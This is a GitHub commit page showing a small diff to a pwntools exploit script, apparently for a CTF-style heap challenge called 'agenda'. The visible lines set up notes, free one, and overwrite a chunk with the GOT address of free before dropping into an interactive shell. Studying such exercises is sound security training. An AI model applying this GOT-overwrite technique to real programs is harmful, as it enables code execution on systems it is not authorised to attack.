Skip to content

Commit cff36d6

Browse files
authored
Deleted unnecessary free
1 parent 82c4d01 commit cff36d6

File tree

1 file changed

+2
-3
lines changed

1 file changed

+2
-3
lines changed

agenda_UAD360/exploit.py

+2-3
Original file line numberDiff line numberDiff line change
@@ -4,7 +4,7 @@
44
context.terminal = ['tmux', 'sp', '-h']
55
# context.log_level = 'DEBUG'
66

7-
elf = ELF('./agenda_main_patched')
7+
elf = ELF('./agenda_main')
88
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
99

1010
io = process(elf.path)
@@ -40,7 +40,6 @@ def free_note(index):
4040
for i in range(11):
4141
add_note(10, str(ord('A') + i) * 10)
4242

43-
free_note(2)
4443
free_note(1)
4544
edit_note(0, 'X' * 32 + p64(elf.got['free']))
4645

@@ -61,4 +60,4 @@ def free_note(index):
6160

6261
io.recv()
6362
io.interactive()
64-
io.close()
63+
io.close()

0 commit comments

Comments
 (0)